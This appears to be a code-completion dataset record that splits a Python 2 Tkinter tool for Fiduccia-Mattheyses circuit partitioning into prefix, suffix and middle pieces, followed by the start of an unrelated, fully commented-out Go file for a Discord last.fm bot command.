def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quite Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Simulated Annelaing Function
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On first run to random placement. This allows pausing and continuing the process
if (self.firstRun == True):
self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost()
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# While difference between 2 and 0. Means the move will not unbalance partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
|
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def main(argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
if __name__ == "__main__":
main(sys.argv[1:])
| """ Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags() | identifier_body |
partitionA3.py | import time
import sys
import getopt
import partitionGUI
import random
import math
import bisect
import numpy as np
import Tkinter as tk
import networkx as nx
import matplotlib.pyplot as plt
from operator import itemgetter
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
from _bisect import bisect_left
from time import sleep
class Partition():
""" Circuit Cell partitioning using Fiduccia-Matheyses
Circuit: A representation of a circuit by Cells to be partitioned in two sites
Cell: Circuit component represented as a Graph node with connections to other Cells as edges
Node: Graph representation of a Cell
Site: Possible location for a Cell (Is Free or is occupied by a Cell)
Block: Graphic representation and data of a Site
"""
def __init__(self,master,seed,inputfile,quietMode):
#=============Parse file to create cells graph===============#
# Create Directed Graph and fill with input file
self.G=nx.DiGraph()
fin = open(inputfile,'r')
self.getGraph(fin)
fin.close()
#================Create Data Structures================#
# Array of Line objects to draw connections
self.connLines = []
# Array of Block objects drawing the rectangles for each site on the circuit, tracks occupancy.
# One per partition
self.sitesA = []
self.blocksA = []
self.sitesB = []
self.blocksB = []
self.sitesABkp = []
self.sitesBBkp = []
# List of Nodes sorted by gains
self.gainOrder = []
# Array of Text objects noting the name of the node assigned to a cell site
self.tags = []
# Assign Initial Seed
self.seed = seed
#================Draw Buttons and plots================#
self.master = master
self.initialize_buttons()
self.initialize_plots()
# Quite Mode to run without graphics
if quietMode:
self.running = True
# FM Partitioning Algorithm
self._startpartition(True)
sys.exit()
def getGraph(self, fin):
""" Parse Input File to fill up Graph structure """
tmpList = fin.readline().split()
# Number of Cells to be partitioned
self.cells = int(tmpList[0])
# Number of Connections or Nets
self.conns = int(tmpList[1])
# Number of Circuit Rows
self.rows = int(tmpList[2])
# Number of Circuit Columns
self.cols = int(tmpList[3])
# Number of available sites in the Circuit
self.sitesNum = self.rows*self.cols
self.winX = self.cols/4
self.winY = self.rows/4
# Add nodes from 0 to number of Cells to graph structure and initialize net array and net cost
self.G.add_nodes_from(range(0,self.cells))
for node in self.G.nodes():
self.G.node[node]["nets"]=[]
self.G.node[node]["locked"]=False
# For every Net, add edges between corresponding nodes
for net in range(0,self.conns):
tmpList = fin.readline().split()
numNodes = int(tmpList[0])
srcNode = int(tmpList[1])
#self.G.node[srcNode]["nets"].append(srcNode)
for conn in range(2,numNodes+1):
self.G.add_edge(srcNode, int(tmpList[conn]))
self.G.node[int(tmpList[conn])]["nets"].append(srcNode)
def initialize_buttons(self):
""" Draw User Buttons on top of interface
Start: Begin placement process
Pause: Pause process. Allows continuing.
Graph: Show Graph nodes to visualize connections
Plot: Show Cost plot to see SA progress
Draw: Show Circuit Cells
"""
self.start_button = tk.Button(self.master, text='Start', command = self.startRunning)
self.start_button.grid(row=0, column=0)
self.pause_button = tk.Button(self.master, text='Pause', command = self.pauseRunning)
self.pause_button.grid(row=0, column=1)
self.graph_button = tk.Button(self.master, text='Graph', command = self.showGraph)
self.graph_button.grid(row=0, column=2)
self.plot_button = tk.Button(self.master, text='Plot', command = self.showPlot)
self.plot_button.grid(row=0, column=3)
self.draw_button = tk.Button(self.master, text='Draw', command = self.drawCells)
self.draw_button.grid(row=0, column=4)
# Initialize Button States and Actions
self.pause_button['state'] = 'disabled'
# Boolean switch to control flow of placement process
self.running = False
# Boolean switch to plot placement connections and tags, turn off for faster processing
self.plot = False
self.drawing = False
self.graph = False
# Boolean switch to specify first run and allow stop/continue behavior that doesn't initialize program
self.firstRun = True
def initialize_plots(self):
""" Draw all graphic components as Canvases
Circuit Canvas: Drawing of the Circuit Sites Rows and Columns to overlay Cell Placement and Connections
Graph Canvas: Drawing of the Graph structure used for the representation of the Cells
Cost Plot Canvas: Plotting of the Cost Function used in the Annealing Process
Plot Toolbar: Toolbar options to explore the Graph and Cost Canvases (Zoom, Save, Move...)
"""
#============================Draw circuit canvas=================================#
# Draw Canvas with hardcoded width 600 and adjustable height to circuit input
ckt_max_x = 600
ckt_max_y = (ckt_max_x*(self.rows))/self.cols
scale_x = round(ckt_max_x / self.cols)
scale_y = round(ckt_max_y / self.rows)
self.canvasCirkt = tk.Canvas(self.master,width=ckt_max_x+scale_x,height=(ckt_max_y*2)+int(scale_y))
self.canvasCirkt.grid(row=1,column=1,columnspan=4)
# Draw border
self.canvasCirkt.create_rectangle(1, 1, (ckt_max_x+2)/2, (ckt_max_y*2)+int(scale_y))
self.canvasCirkt.create_rectangle(((ckt_max_x+2)/2)+scale_x, 1, ckt_max_x+scale_x, (ckt_max_y*2)+int(scale_y))
# Draw cell rows and columns in two groups
blockIndex=0
for cut in range(int(scale_y), int(ckt_max_y*2), int(scale_y)*2):
for cut2 in range(1, int(ckt_max_x), int(scale_x)):
if (cut2>ckt_max_x/2):
cut2+=scale_x
# Coordinates for top and bottom points of rectangle
points = (cut2, cut, cut2+scale_x-1, cut+scale_y)
blockObj = partitionGUI.Block(self.canvasCirkt,points,blockIndex,self.rows,self.cols)
blockIndex+=1
if (cut2>ckt_max_x/2):
self.blocksB.append(blockObj)
else:
self.blocksA.append(blockObj)
#===================================Draw Plots================================#
# Draw Figure for 2 subplots (Connections Graph and Cost Function)
self.figure, self.axes = plt.subplots(2, facecolor="white")
self.figure.set_figwidth(4)
self.axGraph = self.axes[0]
self.axCost = self.axes[1]
# Initial condition for connection Graph
self.axGraph.set_visible(False)
# Select Cost Plot as current Axis. Get lines to use for plot updates
plt.sca(self.axCost)
self.lines, = self.axCost.plot([],[])
self.axCost.set_xlabel("Time")
self.axCost.set_title("Cost")
# Draw Cost function Plot
self.canvasPlot = FigureCanvasTkAgg(self.figure, master=self.master)
self.canvasPlot.get_tk_widget().grid(row=1,column=0)
# Draw Tool Bar
self.toolbarFrame = tk.Frame(self.master)
self.toolbarFrame.grid(row=2,column=0,columnspan=3,sticky="W")
self.toolbarPlot = NavigationToolbar2TkAgg(self.canvasPlot,self.toolbarFrame)
def showGraph(self):
""" User selection to display graph """
self.graph_button['state'] = 'disabled'
# Draw connection Graph
self.axGraph.set_visible(True)
nx.draw(self.G, ax=self.axGraph, with_labels=True)
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def showPlot(self):
""" User selection to display Cost """
self.plot = not self.plot
if self.plot:
self.plot_button['text'] = "No Plot"
else:
self.plot_button['text'] = "Plot"
def drawCells(self):
""" User selection to display Circuit Cells """
self.drawing = not self.drawing
if self.drawing:
self.draw_button['text'] = "No Draw"
else:
self.draw_button['text'] = "Draw"
def startRunning(self):
""" User control for placement process """
self.start_button['state'] = 'disabled'
self.pause_button['state'] = 'normal'
self.running = True
# If first run and not continuation from pause
if (self.firstRun):
self.start_timer = time.clock()
# Simulated Annelaing Function
self._startpartition(False)
# Always display result at the end of the process
self.updateDraw()
#self.updatePlot() #TODO: What to plot
# Disable Buttons when finished
self.pause_button['state'] = 'disabled'
self.plot_button['state'] = 'disabled'
self.draw_button['state'] = 'disabled'
def pauseRunning(self):
""" Pause process of SA by exiting loop """
self.start_button['state'] = 'normal'
self.pause_button['state'] = 'disabled'
self.running = False
def _startpartition(self,quietMode):
""" Start Partitioning Process """
# On first run to random placement. This allows pausing and continuing the process
if (self.firstRun == True):
self.splitPlace()
self.gain()
self.firstRun=False
self.cutCost()
startTimer = time.clock()
self.totalCutCost = self.FMPartition(quietMode)
timeDif = time.clock() - startTimer
print self.totalCutCost, " ",
print timeDif
def FMPartition(self,quietMode):
bestCutCost = self.totalCutCost
for loop in range(0,6):
difParts = -1
i=1
self.cntLocked = 0
while self.cntLocked<self.cells:
# While difference between 2 and 0. Means the move will not unbalance partitions
while not (2>=difParts>=0):
moveNode = self.gainOrder[self.cells-i][1]
moveNodePart = self.G.node[moveNode]["part"]
if self.G.node[moveNode]["locked"]:
i+=1
continue
if moveNodePart == 'A':
movePartSites = self.sitesA
tgtPartSites = self.sitesB
tgtPart = 'B'
else:
movePartSites = self.sitesB
tgtPartSites = self.sitesA
tgtPart = 'A'
# Difference on the number of cells on each site
difParts = len(movePartSites)-len(tgtPartSites) #TODO: Change for incremental size for performance
i+=1
i=1
self.G.node[moveNode]["locked"]=True
self.cntLocked+=1
movePartSites.remove(moveNode)
tgtPartSites.append(moveNode)
self.G.node[moveNode]["part"] = tgtPart
self.incrGain(moveNode)
difParts = -1
self.cutCost()
if not quietMode:
self.axCost.set_title("Best Cost=" + str(bestCutCost))
self.updatePlot(self.totalCutCost)
# Store best result
if (self.totalCutCost<=bestCutCost):
if (self.totalCutCost==bestCutCost):
if (random.random() < 0.8):
continue
self.sitesABkp = list(self.sitesA)
self.sitesBBkp = list(self.sitesB)
self.gainOrderBkp = list(self.gainOrder)
self.GBkp = self.G.copy()
bestCutCost=self.totalCutCost
self.cntLocked=0
self.sitesA = list(self.sitesABkp)
self.sitesB = list(self.sitesBBkp)
self.gainOrder = list(self.gainOrderBkp)
self.keys = [r[1] for r in self.gainOrder]
self.G = self.GBkp.copy()
for node in self.G.nodes():
self.G.node[node]["locked"]=False
return bestCutCost
def cutCost(self):
self.totalCutCost = 0
for node in self.G.nodes():
nodePart = self.G.node[node]["part"]
for nb in self.G.neighbors(node):
if self.G.node[nb]["part"]!=nodePart:
self.totalCutCost+=1
break
def cutIncrCost(self):
pass #TODO:
def updateDraw(self):
""" Draw circuit Connections and Cell Tags """
self.delConns()
self.delTags()
self.drawConns()
self.drawTags()
def updatePlot(self,cost):
""" Cost plot gets updated on every new cost value """
timer = time.clock() - self.start_timer
# Add new values to plot data set
self.lines.set_xdata(np.append(self.lines.get_xdata(), timer))
self.lines.set_ydata(np.append(self.lines.get_ydata(), cost))
# Re-scale
self.axCost.relim()
self.axCost.autoscale_view()
# Update plot
self.canvasPlot.draw()
self.canvasPlot.flush_events()
def splitPlace(self):
""" SPlit placement, for every node a Partition is assigned """
nodeSortedIter = sorted(self.G.degree_iter(),key=itemgetter(1),reverse=True)
placeCnt = 0
for node in nodeSortedIter:
if placeCnt<self.cells/2:
self.sitesA.append(node[0])
self.G.node[node[0]]["part"] = 'A'
else:
self.sitesB.append(node[0])
self.G.node[node[0]]["part"] = 'B'
placeCnt+=1
def randPlace(self):
""" Random placement, for every node a Site is assigned """
random.seed(self.seed)
# Start placement on Partition A
partA = True
for node in self.G.nodes():
randSite = random.randint(0,int(self.sitesNum/2)-1)
if partA:
partSite = self.sitesA
self.G.node[node]["part"] = 'A'
else:
partSite = self.sitesB
self.G.node[node]["part"] = 'B'
while (partSite[randSite].isOcp()):
randSite = random.randint(0,int(self.sitesNum/2)-1)
partSite[randSite].setCell(node)
self.G.node[node]["site"] = partSite[randSite]
# Toggle partition for next placement
partA = not partA
def drawConns(self):
""" Extract center point from each node and draw connection to other nodes """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
for nb in self.G.neighbors(node):
nbX,nbY = self.G.node[nb]["site"].getCenter()
self.connLines.append(self.canvasCirkt.create_line(pX,pY,nbX,nbY))
self.canvasCirkt.update()
def drawTags(self):
""" Extract center point from each node and draw node Tag """
for node in self.G.nodes():
pX,pY = self.G.node[node]["site"].getCenter()
self.tags.append(self.canvasCirkt.create_text(pX, pY, text=node))
self.canvasCirkt.update()
def delConns(self):
""" Delete Connections on Circuit using array of Line objects """
for line in self.connLines:
self.canvasCirkt.delete(line)
self.canvasCirkt.update()
def delTags(self):
""" Delete Tags on Circuit using array of Text objects """
for tag in self.tags:
self.canvasCirkt.delete(tag)
self.canvasCirkt.update()
def gain(self):
""" Find the gain of every node by finding the difference between the number of nodes connected to that node on the same partition (retention force)
and the number of nodes connected that are on the other partition (moving force)"""
for node in self.G.nodes():
# Get number of nodes connected on same and other partition
movForce, retForce = self.nodeForces(node)
nodeGain = movForce-retForce
#Fill list of Nodes with gains
self.gainOrder.append((nodeGain,node))
self.gainOrder.sort(key=lambda r: r[0])
self.keys = [r[1] for r in self.gainOrder]
def incrGain(self,movedNode):
movedNets = set([movedNode])
movedNets.update(self.G.neighbors(movedNode))
movedNets.update(self.G.node[movedNode]["nets"])
for movedNet in movedNets:
movForce, retForce = self.nodeForces(movedNet)
nodeGain = movForce-retForce
del self.gainOrder[self.keys.index(movedNet)]
bisect.insort(self.gainOrder, (nodeGain,movedNet))
self.keys = [r[1] for r in self.gainOrder]
def nodeForces(self,node):
nodePart = self.G.node[node]["part"]
movForce = 0
retForce = 0
for nb in set(self.G.neighbors(node)):
if nodePart != self.G.node[nb]["part"]:
movForce+=3
else:
retForce+=1
connNodes = set(self.G.node[node]["nets"])
for connNode in connNodes:
if nodePart != self.G.node[connNode]["part"]:
movForce+=3
else:
retForce+=1
return movForce, retForce
def quitApp(self):
""" Exit """
self.master.destroy()
self.master.quit()
def | (argv):
#==============Initialize Graphics============#
root = tk.Tk()
#=================Options=================#
# Default Values
inputfile = None
quietMode = False
seed = 30
try:
opts, args = getopt.getopt(argv, "hqs:t:i:", ["ifile="])
except getopt.GetoptError:
print 'test.py -i <inputfile>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'test.py -i <inputfile> [-q] [-s <Seed>]'
print "-q : Quiet Mode"
print "-t <Temperature>: Initial temperature for SA"
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt == '-s':
seed = int(arg)
elif opt == "-q":
quietMode = True
if (not inputfile):
print 'test.py -i <inputfile>'
sys.exit(2)
partition = Partition(root,seed,inputfile,quietMode)
root.wm_title("FM Partitioning Tool. EECE583: Jose Pinilla")
root.protocol('WM_DELETE_WINDOW', partition.quitApp)
root.resizable(False, False)
root.mainloop()
if __name__ == "__main__":
main(sys.argv[1:])
| main | identifier_name |
band.go | package commands
// import (
// "errors"
// "fmt"
// "os"
// "persephone/database"
// "persephone/fm"
// "persephone/lib"
// "strconv"
// "strings"
// "github.com/andersfylling/disgord"
// "github.com/cavaliercoder/grab"
// "github.com/fogleman/gg"
// "github.com/nfnt/resize"
// "github.com/pazuzu156/atlas"
// "github.com/pazuzu156/lastfm-go"
// "golang.org/x/text/language"
// "golang.org/x/text/message"
// )
// // album and track positions for grids
// var (
// albumPositions = []fm.AlbumPosition{
// {
// X: 355,
// Y: 170,
// Shadow: fm.Shadow{
// X: 350,
// Y: 165,
// R: 10,
// },
// Info: fm.InfoText{
// X: 350,
// Y: 340,
// Plays: fm.PlaysText{
// X: 350,
// Y: 360,
// },
// },
// },
// {
// X: 555,
// Y: 170,
// Shadow: fm.Shadow{
// X: 550,
// Y: 165,
// R: 10,
// },
// Info: fm.InfoText{
// X: 550,
// Y: 340,
// Plays: fm.PlaysText{
// X: 550,
// Y: 360,
// },
// },
// },
// {
// X: 355,
// Y: 390,
// Shadow: fm.Shadow{
// X: 350,
// Y: 385,
// R: 10,
// },
// Info: fm.InfoText{
// X: 350,
// Y: 560,
// Plays: fm.PlaysText{
// X: 350,
// Y: 580,
// },
// },
// },
// {
// X: 555,
// Y: 390,
// Shadow: fm.Shadow{
// X: 550,
// Y: 385,
// R: 10,
// },
// Info: fm.InfoText{
// X: 550,
// Y: 560,
// Plays: fm.PlaysText{
// X: 550,
// Y: 580,
// },
// },
// },
// }
// trackPositions = []fm.TrackPosition{
// {
// X: 720,
// Y: 180,
// Plays: fm.PlaysText{
// X: 870,
// Y: 180,
// },
// },
// {
// X: 720,
// Y: 210,
// Plays: fm.PlaysText{
// X: 870,
// Y: 210,
// },
// },
// {
// X: 720,
// Y: 240,
// Plays: fm.PlaysText{
// X: 870,
// Y: 240,
// },
// },
// {
// X: 720,
// Y: 270,
// Plays: fm.PlaysText{
// X: 870,
// Y: 270,
// },
// },
// }
// )
// // Band command.
// type Band struct{ Command }
// // InitBand initializes the band command.
// func InitBand() Band {
// return Band{Init(&CommandItem{
// Name: "band",
// Description: "Gets information on the artist you're currently listening to",
// Aliases: []string{"b"},
// Usage: "band Gorguts",
// Parameters: []Parameter{
// {
// Name: "artist",
// Description: "Gets information on a requested artist",
// Required: false,
// },
// },
// })}
// }
// // Register registers and runs the help command.
// func (c Band) Register() *atlas.Command {
// c.CommandInterface.Run = func(ctx atlas.Context) {
// // this command takes a really long time to complete
// // this message lets the user know that the bot is working
// tempmsg, _ := ctx.Message.Reply(ctx.Atlas, "Please wait while the artist image is generated...")
// defer ctx.Atlas.DeleteMessage(tempmsg.ChannelID, tempmsg.ID) // delete message when command completes
// // Want to check if an artist is supplied or not
// if len(ctx.Args) > 0 {
// artistName := strings.Trim(strings.Join(ctx.Args, " "), " ")
// artist, err := c.getArtistInfo(artistName, ctx.Message.Author)
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, err.Error())
// return
// }
// c.displayArtistInfo(ctx, artist) // display info with requested artist
// } else {
// // current track should have the artist info we need to do a new artist query
// track, err := fm.GetNowPlayingTrack(ctx.Message.Author, c.Lastfm)
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, err.Error())
// return
// }
// artist, err := c.getArtistInfo(track.Artist.Name, ctx.Message.Author) // get full artist info
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, "Couldn't find that artist")
// }
